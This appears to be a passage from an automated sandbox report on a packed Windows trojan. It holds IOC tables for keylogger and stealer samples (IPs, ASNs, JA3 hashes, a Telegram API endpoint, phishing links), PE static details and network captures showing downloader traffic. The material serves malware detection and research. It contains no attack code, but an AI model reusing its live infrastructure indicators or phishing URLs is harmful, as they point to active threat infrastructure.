	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	132.226.247.73
api.telegram.org	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	193.122.6.168
	rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	rBSH200924_pdf.cmd.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	rcontractorder.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
TELEGRAMRU	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	https://qrco.de/bfQgn5	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90	Get hash	malicious	Unknown	Browse	104.18.10.207
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.137.232

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.220
	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	update.js	Get hash	malicious	NetSupport RAT	Browse	149.154.167.220
	LJ1IZDkHyE.hta	Get hash	malicious	Cobalt Strike, Remcos, PureLog Stealer	Browse	149.154.167.220
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//MM0Uyus:fLHxvCsIfA2KRHmOugA1s
MD5:	D453258060AFEB6CAD05A86BCB4BA21D
SHA1:	E9E3DC45C2973773AAA422079A5AD945F1C86389
SHA-256:	CB241A1BDD284207E8ADD0BB2EEB08DB4B2FF9B86569D7E32FB84A9C9E97D857
SHA-512:	F9ED104279065F45CE0EEF584A4435C9B6B90F9DD6E1DE89D4EDB4F635E866A039969B3BDF112888312E3AABB91B2D73EF7CA3E8A7CB34A3CE042B6F1B3090AC
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cspmtibh.w1g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghqruusq.dbt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwyyloqs.uxv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xq2qdmiu.t02.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.83482913122869
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
File size:	694'272 bytes
MD5:	48977f1b641a9a3d88329ac470152381
SHA1:	d0eb9734f9bdeb6ab50ccad4342f92f4d405d2f0
SHA256:	1c829d80809fb2b5f7c2b40cf05064765bf237f655c9ca557e2d5a01f52b4bc6
SHA512:	8f0e68b0b489a5aeb363641dc85408e8358a2fbd822d62cf494ce670294fe8f84d8c0ae2baa6e80c3099b3e37a8b35501b87eac88235e52c935908a0d565975b
SSDEEP:	12288:QkJZPIBQBNWZEV6fewCe5wHdiFNCghayBN9YlXOx5eh8bQb:Q5iNiEVkAe5wMFNChly5BI
TLSH:	98E402542126D61AC0A21BF109A3C1F817BA5DCC7922C28BDFEABEEF7C767511940793
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#...............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4aaa96
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF223B00A [Wed Sep 24 19:24:58 2098 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaaa41	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x620	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa983c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa8a9c	0xa8c00	5c07fe91fd4c98df52bd2358e77555aa	False	0.933125	data	7.84421246743167	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x620	0x800	e43963b5dbdc8fdee2bf00f0e84ba9b5	False	0.33642578125	data	3.4494508521173253	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x200	69dea81a779859ca4eb95a1fa720d7e9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xac090	0x390	data			0.4243421052631579
RT_MANIFEST	0xac430	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T21:54:21.022131+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49703	193.122.6.168	80	TCP
2024-09-25T21:54:22.069011+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49703	193.122.6.168	80	TCP
2024-09-25T21:54:22.614687+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49706	188.114.97.3	443	TCP
2024-09-25T21:54:23.553376+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49708	193.122.6.168	80	TCP
2024-09-25T21:54:25.392729+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49712	188.114.97.3	443	TCP
2024-09-25T21:54:28.112281+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49716	188.114.97.3	443	TCP
2024-09-25T21:54:31.873030+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49722	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 21:54:19.811009884 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:19.816009045 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:19.816071987 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:19.816318035 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:19.821110964 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:20.751400948 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:20.755733967 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:20.760699034 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:20.968812943 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:21.021539927 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.021583080 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.021703005 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.022130966 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:21.028439045 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.028460026 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.538511992 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.538680077 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.543659925 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.543672085 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.544073105 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.585308075 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.602082968 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.647397995 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.719832897 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.719940901 CEST	443	49705	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:21.720073938 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.726128101 CEST	49705	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:21.729464054 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:21.734375000 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:22.004311085 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:22.006670952 CEST	49706	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:22.006711006 CEST	443	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:22.006792068 CEST	49706	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:22.007376909 CEST	49706	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:22.007395029 CEST	443	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:22.069010973 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:22.483731031 CEST	443	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:22.493709087 CEST	49706	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:22.493725061 CEST	443	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:22.614721060 CEST	443	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:22.614907026 CEST	443	49706	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:22.614978075 CEST	49706	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:22.615303993 CEST	49706	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:22.618825912 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:22.620014906 CEST	49708	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:22.625222921 CEST	80	49703	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:22.625276089 CEST	49703	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:22.625941038 CEST	80	49708	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:22.626010895 CEST	49708	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:22.626214981 CEST	49708	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:22.631875992 CEST	80	49708	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:23.499480963 CEST	80	49708	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:23.500583887 CEST	49709	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:23.500623941 CEST	443	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:23.500709057 CEST	49709	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:23.500936031 CEST	49709	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:23.500952959 CEST	443	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:23.553375959 CEST	49708	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:23.975265026 CEST	443	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:23.976898909 CEST	49709	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:23.976927996 CEST	443	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:24.130088091 CEST	443	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:24.130173922 CEST	443	49709	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:24.130445004 CEST	49709	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:24.130703926 CEST	49709	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:24.135467052 CEST	49711	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:24.140453100 CEST	80	49711	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:24.140547037 CEST	49711	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:24.140626907 CEST	49711	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:24.146189928 CEST	80	49711	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:24.776884079 CEST	80	49711	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:24.786533117 CEST	49712	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:24.786578894 CEST	443	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:24.786684036 CEST	49712	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:24.787127018 CEST	49712	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:24.787138939 CEST	443	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:24.834651947 CEST	49711	80	192.168.2.7	193.122.6.168
